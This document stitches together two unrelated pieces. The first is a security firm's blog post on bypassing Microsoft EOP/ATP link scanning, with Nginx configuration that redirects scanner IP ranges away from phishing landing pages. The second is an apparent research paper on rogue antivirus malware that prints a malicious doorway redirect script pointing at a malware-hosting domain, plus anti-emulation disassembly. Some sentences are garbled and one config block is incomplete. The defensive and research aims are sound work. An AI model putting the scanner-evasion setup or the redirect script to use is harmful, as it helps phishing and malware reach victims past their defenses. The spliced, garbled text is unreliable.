Microsoft's Exchange Online Protection (or EOP) acts as an add-on to on-prem exchange or cloud-hosted mailboxes. Below is a list of some of the features it totes:

- Inbound and outbound spam detection.
- Backscatter protection. *Note: backscatter are bounce emails generated by destination mail exchanges when an email address is not valid.*
- Bulk email filtering.
- URL block list lookups and blocking.
- Known spam and phishing sender and domain filtering.
- Anti-malware scanning and detection.

The actual list of what can be done with the service is more impressive the further you read through it. More importantly, it provides administrators and the security team with configuration options to further enhance how incoming email is dealt with.

### Basics of Exchange Online Protection (EOP)

Due to the way the EOP servers are positioned in the flow of email delivery, it acts as a middleman, using its built-in scanners and user-

included configurations to hold our emails comfortable between as malicious.

The following diagram gives a simplified overview of how emails are processed through the EOP service:



Connection filtering is one of the first phases of filtering that emails will go through as part of the overall email delivery process. Its purpose is to allow or block emails as defined by the respective whitelist or blacklist policies configured by administrators.

Moving forward, the Anti-Malware phase passes attachments through EOP's scanners looking for signatures that are known to be bad. Similarly to the first phase, once emails are identified as malicious they will be promptly removed.

Transport Policy Filtering offers a lot more options than connection filtering, allowing administrators to fine tune their anti-spam and routing process. Read through the documentation for more information on what kind of changes can be made from the administrator side.

Although most of the previously mentioned phases EOP passes emails through are important, the real chunk of bad emails will be caught during Content Filtering phase, where administrators can really tighten controls around email delivery dependant on their content. There are various options that can counter an active social engineering campaign, some of which include:

- Disabling image links (or 'bugs', an indicator used by phishing platforms to determine if targets opened the initial email)
- IP address links, which are commonly used to bypass web proxy filters on an internal network
- Domain TLD blacklists
- Content specific filtering, blocking of sensitive words or other indicators

As a social engineer - whether part of an internal infosec team, or an external pentester - it is important to understand default configurations of email security tools like EOP and their most common changes.

## Scanning both links and attachments with EOP

As mentioned previously, content filtering is an important element to any good email security provider. In the case of EOP, and other services, part of the process that is not visible to the client is link and attachment scanning. Although you can configure whether or not attachments can be quarantined, links designated as malicious will usually be handled based on your organizations filtering policy in the background.

According to documentation, EOP's link scanning process entails:

- Identifying if links within emails point to downloadable content (think binaries and documents) and passing these through their attachment scanning engines.
- Analyzing URL reputation from various partner sources, identifying whether or not the URL is malicious.

Although rudimentary, it can become an important defense asset to mitigate a large scale social engineering campaign in the middle of traction. An attacker can put together a great phishing infrastructure and email template and still be stopped along the way by a known bad landing page URL.

Finally, although EOP does provide an introduction to email security and a decent amount of configuration options, it will fail your organization against campaigns using zero-day methods. Case in point: the service may help identify and block emails with known phishing and attachment signatures, and fail with others that do not.

## O365 Advanced Threat Protection (ATP) Addon

Beyond the EOP service, Advanced Threat Protection provides protection for more sophisticated attacks with more proactive approaches, like scanning documents for links and objects in sandboxed environments.

Core features of ATP include:

- Safe Attachments protection from unknown (or zeroday) malware.
- Safe Links, a feature that rewrites links in emails and are scanned in real-time for threats. This includes scanning documents for links and rewriting them as necessary.
- More configuration and logging options that security teams and administrators can use for fine-tuning their environment.
- Spoof intelligence, a mechanism in place to detect spoofed email to/from your organization domain.
- Machine learning and other capabilities for detecting phishing emails.



## ATP and the 'Safe Links' Rewrite Feature

One interesting feature that was introduced by ATP is called Safe Links, where links in emails and documents are actively scanned (by EOP) and rewritten to point to an ATP gateway. Once the link is clicked and it is scanned, it will go through a series of checks before it allows you to navigate to the URL.

Some of the checks taking place during the scan:

- Determine if the link is blacklisted by the organization
- Identify whether the link points to downloadable content (documents, binaries) and scan them
- Has the link been designated as malicious previously?

At this point it will either allow you to continue to the URL or block you from accessing it with a message similar to the following.

At this point the user is warned of the malicious indicators, which drastically lowers the effectiveness of the social engineering campaign.

## Previous Attacks against EOP/ATP

Although link scanning and the 'Safe Links' mechanisms should be respected as great concepts that will attempt to deter sophisticated actors or known campaigns, it is not prone to security failures or misconfigurations. Just like any security tool, it's functionality can suffer at the hands of 'features' (ergo, features which seem dangerous or seem like vulnerabilities) or bugs in the way it handles certain data.

In one finding by Oddvar Moe, he determined that ATP's 'Safe Links' mechanism can be circumvented by sending malicious links in emails without the hyperlink tag present, as in, sending a plaintext URL without making a link using "<a href=URL>". In this case, it looks like Microsoft considers this a design issue and not an actual vulnerability leaving this method open as a potential vector.

In another interesting finding, the folks at Avanan discovered that if you used the "<base>" tag, you could theoretically split the URL at the base and ATP would not properly process the links for designation. Although this issue was fixed shortly after initially reported, it was an effective method while it lasted.

## Circumventing Link-Scanning Products

Our approach to dealing with the aforementioned products (and similar) first starts with taking note of the IP ranges used by the link scanners and sandboxes. With this list in hand, we can now create a strategy on dealing with incoming traffic that we need to trick into thinking our content is legitimate.

We have observed that by redirecting traffic from EOP's ranges away from our landing pages and onto a valid URL on our target organization's domain, our success rates were high while detection remained low.

Although creating custom email templates and landing pages help us achieve a good amount of success, the following really gives us an edge over this particular protection:

- Microsoft publishes the full list of EOP IP ranges at this page or via API
- Link scanning for either service (ATP/EOP) is done by EOP alone

Attacking this vector requires configuring your landing page web server to redirect traffic away from EOP and onto a legitimate as described in the following section.

## Configuring your Phishing Webserver

The following instructions are geared towards a phishing platform which uses Nginx, using the geoip module to handle redirects based on IP. There are other ways to do this, and we chose this method for no particular reason other than it simply works. Feel free to tackle this problem however you would like.

If you are using a web server or technology not based on Nginx, you should read through its documentation to give you an idea as to how to replicate the following steps.

```
1)  Install ngx_http_geoip module on Debian/Ubuntu:
        # apt install nginx-module-geoip

2)  Modify /etc/nginx/nginx.conf to include:
      load_module modules/ngx_http_geoip_module.so;

3)  Create a 'bad' array inside of /etc/nginx/conf.d/[domain].conf before the main server {} config:
```

```
default 0;
2a01:111:f400:7c00::/54 1;
2a01:111:f400:fc00::/54 1;
2a01:111:f403::/48 1;
23.103.132.0/22 1;
23.103.136.0/21 1;
23.103.144.0/20 1;
23.103.198.0/23 1;
23.103.200.0/22 1;
40.92.0.0/14 1;
40.107.0.0/17 1;
52.100.0.0/14 1;
52.238.78.88/32 1;
65.55.88.0/24 1;
65.55.169.0/24 1;
94.245.128.64/26 1;
104.47.0.0/17 1;
157.55.234.0/24 1;
157.56.110.0/23 1;
157.56.112.0/24 1;
207.46.100.0/24 1;
207.46.163.0/24 1;
213.199.154.0/24 1;
213.199.180.128/26 1;
216.32.180.0/23 1;
}

    4) Modify the location config for / within /etc/nginx/conf.d/{domain}.conf to look like:
        location / {
            if ($bad_user) {
                rewrite ^ http://www.contoso.com/target/path/;
            }
        }
```

Once these four steps are completed, you can restart the server and test out your landing pages. For testing purposes, you should add your IP address/range to the bad_user list to confirm redirections are properly taking place once you hit the landing page.

## Applying this Attack to other Email Security Tools

Using redirects to trick link scanning products is nothing new, and has been observed throughout various APT campaigns or red team engagements.

I recently discovered a great tool by @violentlydave called mkhtaccess_red which is able to generate functional .htaccess files, redirecting traffic to bypass known sandbox and threat protection providers. Another great tool for your red teaming / phishing toolkit.

## Remediating Phishing Vulnerabilities

The first step for preventing these attacks is to take advantage of ATPs powerful configuration options, ensuring that links are configured to display warnings and never allow users to 'proceed' and bypass the prompt.

Integrating DNS security tools – whether locally on the corporate network or as a cloud service – can also help catch web traffic from users clicking phishing links. Using a service which categorizes and blocks newly created domains will address most malicious links you encounter. Pairing this with a web proxy to inspect the web traffic directly can take this protection even further.

### User Education and Training

With the human element being the most vulnerable here, social engineering training is extremely important for any organization. Teaching your employees how to spot phishing pages and other indicators, as well as how to properly report the offending payloads will make the difference at the end of the day.

## Conclusion

As mentioned previously, these techniques aren't new but are important to understanding impact if technical controls are circumvented. Going beyond ATP and EOP, almost any other similar service will fall prey to these kind of attacks.

It is important to look at your security capabilities from both the defender and attacker view, as it will give you a broader insight as to where you stand today. Defending your users requires a multi-faceted approach, and I am hopeful with articles like these that organizations can advance their email security posture.

## Related Resources



Risk Misconceptions in Social Engineering Testing



Cloud Security Risks (Part 1): Azure CSV Injection Vulnerability



Abusing Microsoft Word Features for Phishing: "subDoc"



Interested in more information?

Contact Us Today

ASSESSMENT SERVICES

Network Penetration Test
Webapp Penetration Test
AWS Cloud Penetration Testing
GCP Cloud Penetration Testing
Azure Penetration Testing
Mobile App Assessment
Secure Code Review
Social Engineering / Phishing Testing
Vishing (Voice Call) Testing
Red Team Engagements

INDUSTRIES

Healthcare
Finance
Technology
Retail

RESOURCES

Technical Blog
Strategic Blog
Example Pentest Report
Technical Research
Vulnerability Disclosures
Disclosure Policy
Penetration Testing FAQ
Support: AWS Pentest Form

COMPANY

Leadership
Blog
Careers
Company Principles
Contact Us
Get a Quote
RSS Feed

ABOUT US

Rhino Security Labs is a top penetration testing and security assessment firm, with a focus on cloud pentesting (AWS, GCP, Azure), network pentesting, web-application pentesting, and phishing. With manual, deep-dive engagements, we identify security vulnerabilities which put clients at risk.

Endorsed by industry leaders, Rhino Security Labs is a trusted security advisor to the Fortune 500.

# APPENDIX 10

# THE MODERN ROGUE – MALWARE WITH A FACE

*Hamish O'Dea*
Microsoft Pty Ltd, Level 5, 4 Freshwater Place,
Southbank VIC 3006, Australia

Email hamisho@microsoft.com

## ABSTRACT

Over the past year we have seen a significant increase in reports of the type of malware commonly known as rogue security products, or simply 'rogues'. These programs, which display false alerts of system infection and ask for payment to 'clean' the system, have been around for years; however they have recently become more cunning, more sophisticated and more prevalent.

This paper examines what has changed in the rogue landscape in recent times and compares their evolution to that of other types of malware. We look at the ways in which rogues are similar to other malware, from their distribution to the methods they use to evade detection and how they react to large-scale elimination by *Windows Defender* and the *Malicious Software Removal Tool*. We also examine what makes rogues unique and how they extend social engineering techniques beyond the point of getting the malware onto the system through to the user's interaction with the malware itself and beyond. We look at how rogues deal with the distinct challenges of having a recognizable brand and the ways they take advantage of a user's trust in their computing platform, from the operating system to the browser and even the search engine they use.

By analysing rogues in the same way as we look at other types of malware, we get a better idea of how they fit into the overall threat landscape. The rogue is usually the end product of a malware infection scenario – the final payload. As opposed to spam bots, backdoors or password stealers, rogues try to obtain money directly from the user. A rogue differs from most malware only in that it has a face.

## ROGUE DISTRIBUTION

When looking at individual malware components it can be difficult to see their purpose in the overall plan of whoever wrote them. Given that the overwhelming majority of malware is written for profit, it stands to reason that every individual malicious program has some purpose towards this goal. When analysing the Bagle botnet in 2005, we observed that every individual component served at least one of these functions:

- Expansion
- Survival
- Exploitation

This model can be applied to any system that relies on computer compromise by malware. The malware must be distributed in some way (usually the more machines, the better), it must survive on the target systems (at least long enough to execute its payload) and it must exploit that target to ultimately benefit its creator. Any type of malware that is particularly prevalent is likely to be very effective in all of these areas. Before looking at how rogue security scanners carry out these functions, the first question is: are rogues prevalent?

## PREVALENCE

Win32/Renos is a generic name we use at *Microsoft* for rogue downloaders. Some simply download and install a rogue silently, while others display bogus warnings of malware infection or system compromise before prompting to install a rogue security scanner. Measuring the prevalence of Win32/Renos can give us a good idea of the impact that rogues are having.

Win32/Renos was the most prevalent malware family in the second half of 2008 (SIR). It was found by *Microsoft* security tools – including the *Malicious Software Removal Tool* (*MSRT*) and *Windows Defender* – on more than 4.3 million computers between July and December 2008. The second most prevalent family was found on approximately 3.7 million computers. Not only was Win32/Renos top by a large margin, but the number two family was Win32/Zlob, which is also known to download rogues.

In addition to Win32/Renos, rogues themselves were some of the highest reported threats over the same period. Two rogues appeared in the top 10 families: Win32/FakeXPA at position seven with almost 1.7 million computers and Win32/FakeSecSen at number eight with about 1.5 million computers.

How have rogues become so prevalent? None of them self-propagate (at this time), so how do they get onto so many machines? As is commonly the case with modern malware, there are several different ways. The following are some of the most notable.

## BLACKHAT SEO

Search engine optimization, or SEO, is a term used to describe techniques for increasing traffic to a website from search engines. Sometimes these practices are considered acceptable; those that aren't are often called 'blackhat SEO' techniques. Any technique that is used to improve traffic to sites hosting content that is not relevant to the search term is blackhat SEO. Since people generally don't go looking for malware, this is what rogue creators need to do.

There have been several well documented cases of blackhat SEO being used to distribute rogues. The techniques involved in getting a site to a high position in a search result are beyond the scope of this paper, but I will present an example to illustrate how they have been used effectively for rogues in particular.

On 2 April 2009, a popular web comic called *XKCD* published a comic that included the phrase 'Higgs excitation' [1].

The term 'Higgs excitation' became the 25th most searched for term on 2 April, according to *Google* trends [2]. As



*Figure 1: XKCD comic, 2 April 2009.*

*Windows* is the top target for malware due to being the dominant desktop operating system, *Google* search is the top target for malware when it comes to search engines. In this particular case, there was very little information about the term 'Higgs excitation' on the web; the majority of the search results were not related to the term at all.



*Figure 2: Top eight Google search results for 'Higgs excitation' on 6 April 2009.*

The four highlighted search results in Figure 2 contained no information related to the term 'higgs excitation'; in fact all four URLs directed to malware at the time. We can see from the results that three of the remaining four also appear to be unrelated, with one result clearly showing the phrase inserted in the middle of an unconnected piece of text: 'So whoever reached out to Higgs Excitation Yardeni did so very carefully'. The web pages containing this text are called doorway pages and are created for search engines to see, not for humans [3].



*Figure 3: An example doorway page.*

The idea is that a search engine's spider will see the doorway page, but a person following a link from a search result is directed to a different page either through server-side redirection (e.g. a .htaccess file on the web server) or client-side redirection (e.g. meta refresh commands or JavaScript). Often you might see a doorway page if you enter the URL directly into your browser, rather than following the link from a search result. This is because the redirect scripts often check the HTTP referrer.

For example, here is a script from a doorway page that redirects to a page distributing the rogue Win32/FakeXPA:

```
var ref,i,is_se=0;

var se = new Array("google.","msn.","yahoo.",
"comcast.","aol.");

if(document.referrer)ref=document.referrer;

else ref="";

for(i=0;i<5;i++)

{

if(ref.indexOf("site:")!=-1) {}

else {if(ref.indexOf(se[i])>=0)

{is_se=1;

if (navigator.userAgent.indexOf("Firefox")!=-1)
document.write('<div style="position: absolute; top:
0; left: 0; width: 100%; height: 100%; background-
color: #FFFFFF; padding: 0px"><iframe src="http://
macrosoftwarego.com/go.php?id=2022&key=4c69e59ac&p=1
" width="100%" height="100%">');

else if (navigator.userAgent.indexOf("Chrome")!=-1)
document.write('<div style="position: absolute; top:
0; left: 0; width: 100%; height: 100%; background-
color: #FFFFFF; padding: 0px"><iframe src="http://
macrosoftwarego.com/go.php?id=2022&key=4c69e59ac&p=1
" width="100%" height="100%">');

else window.location="http://macrosoftwarego.com/
go.php?id=2022&key=4c69e59ac&p=1";}}

}
```

The script checks the referrer and attempts to load a page from macrosoftwarego.com only if the referrer contains a string indicating it is from a search portal. It is also interesting to note that if the browser is *Firefox* or *Google Chrome*, the script opens the page in an IFRAME, otherwise it redirects the browser by changing window.location.

The page on macrosoftwarego.com redirects again, but this time the redirection is performed by a server-side script. The script does not appear to check the referrer, but does check the IP address from which the request originates. When requested from an address traceable to *Microsoft*, this page simply returns HTTP error 404 (not found). When retrieving the page from elsewhere, it returns HTTP 302 to redirect the requestor to http://antivirus-scanner-v1.com/1/?id=2022& smersh=27cda2196&back=%3DDQ0xDz4MMQOMI%3DO, the page that hosts the Win32/FakeXPA rogue.

In the 'Higgs excitation' example, some of the doorway pages redirected to a page that claimed it encountered an error displaying a video and instructed the user to download a 'new version of video decoder'. Other doorway pages redirected to fake online scanner pages. In all cases the pages would eventually try to download a malicious executable. From just this one search term we found installers for several different families of rogues, including Win32/FakeRean, Win32/Winwebsec, Win32/WinSpywareProtect and Win32/FakePlus.

THE MODERN ROGUE – MALWARE WITH A FACE  O'DEA



*Figure 4: Fake video/ActiveX error page.*



*Figure 6: Example spam linking to Cbeplay/Renos.*



*Figure 5: Fake online scanner page.*



*Figure 7: Spam directing the recipient to a fake online scanner.*

Other types of malware are disseminated using SEO techniques – notable families include Win32/Alureon, Win32/Zlob and Win32/Koobface – but rogues are one of the most common. We will examine why later.

## SPAM

Spam is still a popular method of distributing malware of various types and rogues are no exception. Some spam directs users to fake 'video codec required' or online scan web pages like the ones above, while other spam links directly to malicious executables. One campaign, for example, purported to link to free videos of celebrities.

This particular spam contained a link directly to malware, but the malware itself varied over time. In some cases it was a trojan called Win32/Cbeplay; in others it was Win32/Renos. Win32/Cbeplay is a trojan that receives instructions to download and execute other malware. At the time this email was sent, this usually included a spam bot such as Win32/Srizbi, Win32/Rustock or Win32/Cutwail. Often Win32/Cbeplay would also be instructed to download Win32/Renos. One way or another this particular spam campaign, along with the highly publicized 'CNN.com Daily Top 10' spam around the same time [4], was distributing Win32/Renos and through that a rogue called Win32/Antivirusxp.

In April 2009, a rogue called Win32/WinSpywareProtect tried to take advantage of concern over the Win32/Conficker worm with a spam message claiming to come from *Microsoft*.

In this case, the spam directed the user to what was ostensibly a security scanner, just as the message claimed. In fact it was a typical fake online scanner that invariably reported the same non-existent infections to encourage the user to install the rogue. Ironically, Win32/Conficker was not among the infections it reported.

## FLASH ADVERTISEMENTS

Malicious *Flash* advertisements, often called 'malvertisements', have been associated with rogues at least since early 2007 when they were used to distribute programs that called themselves Errorsafe and Drivecleaner (variants of Win32/Winfixer) [5]. The process is quite simple – the *Flash* advertisements contain script to redirect to other URLs, often only after a particular trigger date.

To begin with the advertisements were typically for non-existent companies, but they soon moved to fake advertisements for real products and services, presumably in an effort to appear less suspicious. The practice has been used extensively by Win32/FakeXPA and has continued at least until May 2009 with rogues such as Win32/FakeRemoc (going by the name 'Total Virus Protection') and



*Figure 8: Imitation advertisement that redirects to a rogue website.*



*Figure 9: Fake online scanner page as displayed by Win32/Koobface.*

Win32/Winwebsec employing advertisements like the one shown in Figure 8. As is the case with SEO techniques, these usually redirect to fake online scanner pages.

In December 2008 the US Federal Trade Commission (FTC) requested and received a restraining order against two companies involved with distributing rogues including Win32/Winfixer and Win32/FakeXPA. The FTC complaint alleged that the companies 'falsely claimed that they were placing Internet advertisements on behalf of legitimate companies and organizations' [6].

## WIN32/WALEDAC AND WIN32/CONFICKER

It is not just specialist downloaders like Win32/Renos that have been known to install rogues. In fact, it seems that virtually every major malware family installs a rogue at one time or another, either directly or indirectly. This isn't surprising as we know that rogue earnings are shared via an affiliate system [7], meaning that any malware creator can get a share of the profits. One high profile example is Win32/Waledac [8]. While we had observed Waledac downloading a rogue called Win32/FakeSpyPro before, it was reports that Waledac was being downloaded by Conficker [9] that attracted public interest. There had been much speculation as to how the Conficker botnet would be used to generate revenue – we were not surprised to see a rogue as the eventual payload.

## WIN32/KOOBFACE

Win32/Koobface is a worm that spreads through social networking sites, including *Facebook* [10]. Win32/Koobface was removed from almost 200,000 machines when it was first added to the *MSRT* in March 2009 [11]. It has a variety of payloads but a common one has been to launch 'chrome-less' *Internet Explorer* windows to display fake online scanner pages that deliver rogues.

The page that Win32/Koobface loads is often the same page that SEO doorway pages redirect to; the URLs always include some kind of affiliate ID to connect the distributor to the page impression. In the same way, Win32/Koobface isn't tied to any particular rogue. We have seen it distribute Win32/FakeXPA, Win32/Winwebsec and Win32/InternetAntivirus using these pop-ups.

Win32/Waledac and Win32/Koobface aren't the only high profile malware families that we have seen distributing rogues. Win32/Alureon, Win32/Cutwail and Win32/Bredolab are all prevalent families that we have observed downloading rogues in addition to their other payloads.

## ROGUE SURVIVAL

Unlike a bot, whose goal is to survive on a compromised host for as long as possible, a rogue's purpose may be fulfilled in a very short time; however, avoiding detection is just as important to a rogue as to any other type of malware, especially at the time of installation.

## CODE OBFUSCATION

Code obfuscation of one form or another is virtually ubiquitous in the world of malware. It describes the process of compressing, encrypting or otherwise modifying the malware's code and data and wrapping it inside a layer of code that deciphers it at runtime. The goal is to hide the malware's true form and purpose from someone trying to reverse engineer it and, above all, from anti-malware scanners. Code obfuscation is often combined with server-side polymorphism, where the malware binaries hosted on a malicious or compromised host are regularly updated, making the threat appear polymorphic. In some cases the malware binary may be different every time it is downloaded; in others it may only change once a day.

Code obfuscation is employed by rogues just as it is for other malware types. In fact, we often see the same obfuscators being used for rogues as we see applied to other sorts of malware. A simple example is Win32/FakeSecSen, which used commercially available software called ASProtect, commonly used by other malware such as IRC bots. Increasingly we see custom, 'underground' obfuscators being used. These are generally used only for malware and give the malware creators more control, particularly when it comes to techniques for evading anti-malware scanners. The rogues Win32/InternetAntivirus and Win32/FakeSpyguard, for example, employ an obfuscator that has also been used extensively on prevalent variants of Win32/Alureon, a multi-purpose trojan.

Server-side polymorphism leads to huge numbers of distinct malicious files. Win32/FakeXPA was found in over 9,000 unique executable files in January 2009 alone.

## DETECTION VS. REACTION

Using custom obfuscation wrappers enables the malware creator to more quickly adapt to detection by anti-malware scanners. Server-side polymorphism is effective against simple checksum or signature matching, but generic signatures and code emulation can 'see through' the obfuscation and detect the underlying malware regardless of changes to the polymorphic outer shell. We have seen custom obfuscators manually changed, very quickly, in response to generic detection. In tracking and analysing rogues, we have found that they are probably adapted more quickly and more often than any other type of malware. Moreover, we have seen several cases where these adaptations were, without doubt, targeted specifically at *Microsoft*'s anti-malware engine.

The reason the makers of rogues in particular spend time and effort trying to evade detection by *Microsoft*'s anti-malware engine can be seen in the numbers of rogues we detect. Rogues come under the scope of *Windows Defender* and the *MSRT*. *Windows Defender* is included with *Windows Vista* and available as a free download for earlier *Windows* versions and *MSRT* is delivered to all *Windows* users who want it, through *Microsoft Update* and *Windows Update*. Between them, they have a very large install base and the ability to make an impact on the size of a rogue's revenue.

None of this proves that these rogues are changed deliberately to avoid *Microsoft*'s anti-malware signatures; however, there are many cases where the evidence of this is extremely compelling and several where it is undeniable. Two anti-emulation tricks used by the obfuscator utilized by Win32/InternetAntivirus (as well as Win32/FakeSpyguard, Win32/Alureon and others) are particularly notable.

On 23 March 2009 we discovered a variant of Win32/InternetAntivirus that called the Win32 API function GetVolumeInformation() in order to query the serial number of the C: drive. The following is a fragment of disassembly from that sample:

```
0041965D    push    '\:C'
00419662    push    0    ; DWORD nFileSystemNameSize
00419664    push    0  ; LPTSTR lpFileSystemNameBuffer
00419666    push    0  ; LPDWORD lpFileSystemFlags
00419668    push    0  ; LPDWORD
lpMaximumComponentLength
0041966A    push    dword ptr [ebp-0Ch]   ; LPDWORD
lpVolumeSerialNumber
0041966D    push    0     ; DWORD nVolumeNameSize
0041966F    push    0     ; LPTSTR lpVolumeNameBuffer
00419671    push    esp   ; LPCTSTR lpRootPathName
00419672    add   byte ptr [esp], 1Ch
00419676    call   eax    ;
KERNEL32.DLL!GetVolumeInformationA
00419678    add   esp, 4
0041967B    mov   eax, [ebp-14h]
0041967E    cmp   eax, 7C812ED4h
00419683    ja    short continue
00419685    cmp   eax, 7C812ED4h
0041968A    jb    short continue
0041968C    int   3     ; Unhandled exception
0041968D continue:
```

```
0041968D    pop    eax
...
(Sample SHA1: 0x02feb5f90a768b391f1669080c6342f4fa2
7394c)
```

The chances that the serial number would match the value this code is checking for (0x7C812ED4) when running in the wild on a real system are virtually none, therefore execution would continue normally and the malware body would be decrypted and executed. When running inside our anti-malware engine's emulator, however, the value did match 0x7C812ED4. This caused execution to take a different path, leading to an exception; the malware body was not decrypted and we did not detect the file. Interestingly, we were not setting the value to 0x7C812ED4 deliberately. This was the number that was pointed to by lpVolumeSerialNumber before the function was called and our implementation of GetVolumeInformation() did not change it.

To counter this, we implemented a quick fix to our GetVolumeInformation() implementation which set the data pointed to by lpVolumeSerialNumber to a fixed value. The number has no real significance, so I chose the serial number of the C: drive on my own lab computer, which happened to be 0xf49ca14e. The signature with this change was released at approximately 1:30 PM, 23 March (GMT). At 10:02 PM, 23 March (GMT) we received another sample of Win32/InternetAntivirus, which contained slightly different code:

```
00419663    push    '\:C'
00419668    push    0    ; DWORD nFileSystemNameSize
0041966A    push    0    ; LPTSTR
lpFileSystemNameBuffer
0041966C    push    0  ; LPDWORD lpFileSystemFlags
0041966E    push    0  ; LPDWORD
lpMaximumComponentLength
00419670    push    dword ptr [ebp-0Ch]   ; LPDWORD
lpVolumeSerialNumber
00419673    push    0     ; DWORD nVolumeNameSize
00419675    push    0     ; LPTSTR lpVolumeNameBuffer
00419677    push    esp   ; LPCTSTR lpRootPathName
00419678    add   byte ptr [esp], 1Ch
0041967C    call   eax    ;
KERNEL32.DLL!GetVolumeInformationA
0041967E    add   esp, 4
00419681    mov   eax, [ebp-14h]
00419684    cmp   eax, 0F49CA14Eh
00419689    ja    short continue
0041968B    cmp   eax, 0F49CA14Eh
00419690    jb    short continue
00419692    int   3     ; Unhandled exception
00419693 continue:
00419693    pop    eax
...
(Sample SHA1: 0xfab5efa048d9c106af3-
eb6ebad86fdf28eba163f)
```

The code was now checking specifically for the value returned by our engine – the one I had chosen from my lab computer only hours earlier.

We immediately changed our implementation again, employing a variable serial number (essentially random) so that the value could not be used to identify our emulator. The next variant of the malware used a different anti-emulation technique.

The same obfuscator has also used the current directory, specifically the length of the current directory string, to

recognize if it was running in the *Microsoft* anti-malware engine's emulator. This meant that malware using the obfuscator would not work if it was run from certain directories. We countered this by changing the current directory, within our engine's virtual environment, to 'C:\Documents and Settings\Administrator\Desktop\'. We made this change only when we recognized a file that appeared to be encrypted with this particular obfuscator. On 7 April 2009 we saw a sample of Win32/InternetAntivirus that contained this anti-emulation code:

```
00419676      push      0            ; lpBuffer
00419678      push      0            ; nBufferLength
0041967A      call      eax   ; GetCurrentDirectoryW
0041967C      cmp       eax, 0
0041967F      jb        short cmp_to_48
00419681      jmp       short jmp_cmp_to_4
00419683
00419683 cmp_to_4:
00419683      cmp       eax, 4
00419686      ja        short cmp_to_48
00419688      jmp       short exit
0041968A
0041968A jmp_cmp_to_4:
0041968A      jmp       short cmp_to_4
0041968C
0041968C cmp_to_48:
0041968C      cmp       eax, 48
0041968F      jb        short continue
00419691      jmp       short jmp_cmp_to_49
00419693
00419693 cmp_to_49:
00419693      cmp       eax, 49
00419696      ja        short continue
00419698
00419698 exit:
00419698      push      69260152h
0041969D      push      [ebp+var_10]
004196A0      call      sub_4192B1
004196A5      push      eax
004196A6      call      eax        ; GetTickCount
004196A8      pop       eax
004196A9      call      eax        ; GetTickCount
004196AB      add       esp, 40h
004196AE      retn
004196AF
004196AF jmp_cmp_to_49:
004196AF      jmp       short cmp_to_49
004196B1
004196B1 continue:
004196B1      add       esp, 4
...
(Sample SHA1: 0x50E8E5A65023C95C563D957C2ECD6465F06
A6792)
```

Essentially, if the length of the buffer required to hold the current directory string was 48, 49, or <= 4 bytes, the program would exit without decrypting. Our current directory string was 49 bytes long (including the null-terminating character). Notably, this not only stopped our engine from decrypting the file, but it also prohibited malware that used the obfuscator from running in many real situations. Our next move was to change our current directory string to 'C:\Program Files\Internet Antivirus Pro\', which is 41 bytes long including the null-terminating character. This is the directory that the Win32/InternetAntivirus fake scanner ran

from. Not long after that change we received a sample with this code:

```
0047D676      push      0       ; lpBuffer
0047D678      push      0       ; nBufferLength
0047D67A      call      eax     ; GetCurrentDirectoryW
0047D67C      cmp       eax, 5
0047D67F      jb        short cmp_to_40
0047D681      jmp       short jmp_cmp_to_5
0047D683
0047D683 cmp_to_5:
0047D683      cmp       eax, 5
0047D686      ja        short cmp_to_40
0047D688      jmp       short exit
0047D68A
0047D68A jmp_cmp_to_5:
0047D68A      jmp       short cmp_to_5
0047D68C
0047D68C cmp_to_40:
0047D68C      cmp       eax, 40
0047D68F      jb        short continue
0047D691      jmp       short jmp_cmp_to_41
0047D693
0047D693 jmp_cmp_to_41:
0047D693      cmp       eax, 41
0047D696      ja        short continue
0047D698
0047D698 exit:
0047D698      push      69260152h
0047D69D      push      [ebp+var_10]
0047D6A0      call      sub_47D2B1
0047D6A5      push      eax
0047D6A6      call      eax
0047D6A8      pop       eax
0047D6A9      call      eax
0047D6AB      add       esp, 40h
0047D6AE      retn
0047D6AF
0047D6AF jmp_cmp_to_41:
0047D6AF      jmp       short cmp_to_41
0047D6B1
0047D6B1 continue:
0047D6B1      xor       [esp+58h+var_58], 697A6AFEh
...
(Sample SHA1: 0x6A9684AF4E9A495A8F78537D8B3809322EC
25659)
```

This was a surprising result. As the decryption/unpacking layer would exit if the buffer containing the current directory was 41 bytes long, such as 'C:\Program Files\Internet Antivirus Pro\', the rogue was essentially crippled. When it ran after installation, or when the system was rebooted, or even when launched through the start menu, it would simply exit. We left our current directory as it was and employed other ways to counter the anti-emulation technique. Again, the next variant of the malware moved on to another technique.

Win32/FakeXPA has been similarly quick in reacting to generic detection. In January 2009 there were 12 changes made to Win32/FakeXPA in reaction to changes we made to our signatures. We were able to track each new variant by monitoring their download locations. Often these locations changed daily, but their redirect web pages were always updated to point to the new domains. The following are a few of the domains used to host Win32/FakeXPA around that time:

- anti-virus-secure-scanner.com
- live-antivirus-pc-scan.com
- premium-antivirus-scan.com
- bestantimalwarescanner.com
- best-antimalware-scanner.com
- internetupdateserver.com
- securedupdatedownload.com

By monitoring each new variant, we could see that they were being changed in reaction to our own signature changes. Win32/FakeXPA's anti-emulation code was only changed after our own signatures were modified. It is worth noting that Win32/FakeXPA has often used multiple anti-emulation methods at a time. So while at *Microsoft* we only saw changes in reaction to our own signature updates, it is possible that Win32/FakeXPA was also being updated to evade other anti-virus tools. If these changes did not affect our own detection, we would be unlikely to notice them.

Introducing new anti-emulation techniques in code obfuscation wrappers isn't the only way rogues have tried to evade detection. Win32/FakeSecSen actually removed obfuscation in an attempt to avoid recognition. The rogue was initially encrypted with ASProtect, but then changed to using no obfuscator or packer at all. This had the effect of making the files appear less suspicious to our engine, to the extent that we no longer detected them generically. Once we adjusted our signatures for this change, Win32/FakeSecSen began a series of changes to their code and functionality to try to evade generic detection. These generally involved splitting strings within the rogue's binary into multiple parts and then joining them together with sprintf() statements. This not only divided the strings but also changed the code that referenced those strings; enough of these changes would eventually produce a file that was not generically detected.

```
push    ecx
push    offset aIvacyRi   ; "ivacy ri"
push    ebp
push    offset aIsk       ; "isk:"
push    offset aDataLo    ; "Data lo"
push    offset aSssRSSPrSskS ; "%sss r%s %s\r\nPr%ssk: %s"
push    edx               ; LPSTR
call    edi  ; wsprintfA
```

*Figure 10: Win32/FakeSecSen generating strings from fragments.*

Changes at this level of the code would be relatively time consuming for the malware creator, requiring a lot of trial and error. Eventually Win32/FakeSecSen's creator gave up. The increasing amount of work required to escape detection was undoubtedly part of the reason, but there was something else that made a big impact on Win32/FakeSecSen's viability.

## THE MSRT EFFECT

